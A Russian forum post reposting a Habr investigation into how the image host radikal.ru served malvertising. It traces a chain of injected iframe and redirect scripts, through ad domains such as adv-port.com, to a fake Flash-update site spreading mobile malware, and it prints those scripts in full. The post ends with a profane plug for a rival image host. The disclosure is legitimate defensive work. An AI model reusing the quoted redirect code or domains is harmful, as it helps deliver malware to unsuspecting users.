Создание темы
1
Radikal.ru распространяет вирусы
Пожалуйста прочитайте заметку целиком. Это достаточно важно, так как Радикал, к сожалению, используется повсеместно и даже наличие альтернатив, уже более удобных и быстрых, не позволяют его послать к херам. use our http://ipic.su , Luke!
Заметка с хабра:
http://habrahabr.ru/post/144819/
История началась с смски «срочно выйди в скайп» — писал клиент, хозяин одного из сайтов, которому я помогаю в обеспечении жизнедеятельности этого самого сайта. Оказалось, он получил письмо от некоего Alexander Goryachev с утверждением, что сайт скорее всего заражен.
Вот текст письма:
Здравствуйте.
Меня зовут Александр Горячев, я аналитик компании «Доктор Веб».
Имеется информация, что при открытии изображений в данной теме yarportal.ru/topic324608s0.html на формуе yarportal.ru происходит переадресация с сайта-хостинга radikal.ru на мошеннический сайт, который распространяет вредоносные программы для мобильных устройств под видом обновлений ПО. То есть если используется мобильное устройства (телефон, смартфон), то сначала открывается страничка radikal.ru с нужным изображением, но затем почти сразу происходит перенаправление на мошеннический сайт (пример — newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413). Если открывать изображения непосредственно на самом хостинге, без промежуточного звена в лице yarportal.ru, такого поведения не наблюдается. Возможно, yarportal.ru был взломан или на нем используется недобросовестная рекламная модель, о которой владельцы портала могут и не знать.
Из контактной информации наиболее подходящим был ваш, поэтому было решено сообщить по нему. Можете ли вы как-то прокомментировать ситуацию и заняться решением данного вопроса? Будем признательны, если вы сможете предоставить какую-либо информацию.
Спасибо.
Сайт представляет из себя достаточно большой форум, соответственно юзеры выкладывают картинки куда угодно, а потом ставят туда ссылки в том виде, который им показывает картинкохостинг. Радикал, увы, один из самых популярных.
Попытался повторить действия аналитика и посканить трафик, который при этом идет на мобильное устройство. Действительно, редирект на этот самый newbrwzer происходит, но не совсем понятно, при чем тут наш сайт. Анализ трафика показал, что вредоносную ссылку выдает сам радикал примерно следующим путем:
$ curl -s http://radikal.ru/F/s45.radikal.ru/i107/1205/76/593cc990c6ae.jpg.html | grep adv-port
<script>document.write('<iframe border="0" marginwidth="0" marginheight="0" src="http://adv-port.com/view2.php?title='+document.title+'&referrer='+document.referrer+'&lang='+navigator.language+'"frameborder="0" height="120" scrolling="no" width="240"></iframe>');</script>
Далее это отсылает браузер на страницу вида:
http://adv-port.com/view2.php?title=%D0%A0%D0%B0%D0%B4%D0%B8%D0%BA%D0%B0%D0%BB-%D0%A4%D0%BE%D1%82%D0%BE%20::%20%D0%A3%D0%B2%D0%B5%D0%BB%D
Где встречается следующий код:
<script src="http://adv-port.com/ctr.php?ref='+document.referrer+'"></script>
По ссылке httр://adv-port.com/ctr.php?ref='+document.referrer+' имеется следующий код:
function error() {
top.location='http://network-sitead.com/';
}
По этой ссылке есть следующий код:
<script src='http://on-line-adv.com/2.php'></script>
Загрузка этой ссылки выдает следующее:
document.location='http://newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413'
Т.е. в конце-концов браузер действительно попадает на страничку с предложением «обновить» флеш-плеер. Чуть позже выяснилось, что некоторые пользователи действительно «обновляют» его:
yarportal.ru/topic332505.html
От Джольки:
Что я могу сказать еще - крышку в гроб Радикала забиваем все дружно вот уже не первый год, я стараюсь всех пересадить на наш хостинг http://ipic.su не для того чтобы заработать на нем, а только для того, чтобы никто не юзар долбанный радикал. Я готов даже платить деньги за свой хостинг изображений, лишь бы не видеть Радикал.
И да, для фанатов Радикала есть такие вот настройки:
Ну это просто пиздец же:
Почувствуй разницу